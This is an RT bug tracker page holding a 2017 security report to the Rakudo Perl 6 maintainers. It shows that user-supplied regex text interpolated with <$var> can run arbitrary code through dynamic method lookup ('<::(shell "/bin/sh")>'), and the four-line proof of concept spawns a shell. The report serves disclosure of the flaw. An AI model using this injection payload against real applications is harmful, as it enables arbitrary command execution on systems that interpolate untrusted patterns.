Skip Menu |
Report information
Id: 131079
Status: new
Priority: 0/
Queue: perl6

Owner: Nobody
Requestors: lloyd.fourn [at] gmail.com
Cc:
AdminCc:

Severity: (no value)
Tag: (no value)
Platform: (no value)
Patch Status: (no value)
VM: (no value)



To: "rakudobug [...] perl.org" <rakudobug [...] perl.org>
From: Lloyd Fournier <lloyd.fourn [...] gmail.com>
Subject: [SEC] regex injection allows arbitrary execution using dynamic method lookup
Date: Thu, 30 Mar 2017 12:40:27 +0000
Download (untitled) / with headers
text/plain 196b
my $regex-from-user = '{ shell "/bin/sh" }';
try say "foo" ~~ /<$regex-from-user>/; # won't work
$regex-from-user = '<::(shell "/bin/sh")>';
try say "foo" ~~ /<$regex-from-user>/; # you got owned




This service is sponsored and maintained by Best Practical Solutions and runs on Perl.org infrastructure.

For issues related to this RT instance (aka "perlbug"), please contact perlbug-admin at perl.org